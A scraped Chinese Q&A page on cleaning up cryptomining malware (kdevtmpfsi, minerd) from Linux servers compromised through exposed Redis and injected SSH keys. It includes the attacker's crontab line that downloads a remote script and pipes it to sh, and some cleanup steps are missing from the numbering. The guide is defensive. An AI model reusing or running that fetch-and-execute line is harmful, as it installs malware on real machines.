當前位置:首頁 » 挖礦知識 » redis寫入ssh密匙挖礦

redis寫入ssh密匙挖礦

發布時間: 2023-05-20 03:38:56

挖礦病毒怎麼處理

挖礦病毒處理步驟如下:

1、查看伺服器進程運行狀態查看伺服器系統整體運行情況,發現名為kdevtmpfsi的挖礦進程大量佔用系統CPU使用率。

2、查看埠及外聯情況查看埠開放狀態及外聯情況,發現主機存在陌生外聯行為。對該外部地址進行查詢發現屬於國外地址,進一步確定該進程為惡意挖礦進程:定位挖礦進程及其守護進程PID挖礦病毒kdevtmpfsi在運行過程中不僅會產生進程kdevtmpfsi。

6、查看redis日誌通過查看redis配置文件/etc/redis.conf發現日誌功能未開啟。

7、查找敏感文件發現authorized_keys文件。

8、查看ssh日誌文件查看ssh日誌文件,發現大量登陸痕跡以及公鑰上傳痕跡。

② 阿里雲伺服器被挖礦了怎麼辦(純純電腦小白

1. 關閉訪問挖礦伺服器的訪問

iptables -A INPUT -s xmr.crypto-pool.fr -j DROP and iptables -A OUTPUT -d xmr.crypto-pool.fr -j DROP.

2. chmod -x minerd ,取消掉執行許可權, 在沒有找到根源前,千萬不要刪除 minerd,因為刪除了,過一回會自動有生成一個。

3. pkill minerd ,殺掉進程

4. service stop crond 或者 crontab -r 刪除所有的執行計劃

5. 執行top,查看了一會,沒有再發現minerd 進程了。

6.檢查/var/spool/cron/目錄下發現有個root用戶的定時器文件。

下載腳本的語句:

*/5 * * * * curl -fsSL http://www.haveabitchin.com/pm.sh?0105010 | sh
病毒文件內容如下,感興趣的可以研究下:

View Code

解決minerd並不是最終的目的,主要是要查找問題根源,我的伺服器問題出在了redis服務了,黑客利用了redis的一個漏洞獲得了伺服器的訪問許可權,http://blog.jobbole.com/94518/然後就注入了病毒,下面是解決辦法和清除工作:

1. 修復 redis 的後門,

配置bind選項, 限定可以連接Redis伺服器的IP, 並修改redis的默認埠6379.
配置AUTH, 設置密碼, 密碼會以明文方式保存在redis配置文件中.
配置rename-command CONFIG 「RENAME_CONFIG」, 這樣即使存在未授權訪問, 也能夠給攻擊者使用config指令加大難度
好消息是Redis作者表示將會開發」real user」,區分普通用戶和admin許可權,普通用戶將會被禁止運行某些命令,如conf
2. 打開 ~/.ssh/authorized_keys, 刪除你不認識的賬號

3. 查看你的用戶列表,是不是有你不認識的用戶添加進來。 如果有就刪除掉.

熱點內容
比特幣監管6月 發布:2025-09-30 15:01:59 瀏覽:38
比特幣APP倒閉了 發布:2025-09-30 14:56:43 瀏覽:874
投比特幣挖礦廠 發布:2025-09-30 14:53:49 瀏覽:579
比特幣最便宜的時候是多少錢一台 發布:2025-09-30 14:18:46 瀏覽:526
請將BTC充值到如下地址 發布:2025-09-30 14:12:05 瀏覽:475
買了usdt在哪裡查看 發布:2025-09-30 13:55:51 瀏覽:856
萊特幣根據什麼漲幅的 發布:2025-09-30 13:51:32 瀏覽:317
什麼是比特幣合約張數 發布:2025-09-30 13:49:04 瀏覽:480
國家發行數字貨幣的時間表 發布:2025-09-30 13:48:11 瀏覽:909
比特幣合約怎麼測算 發布:2025-09-30 13:34:16 瀏覽:661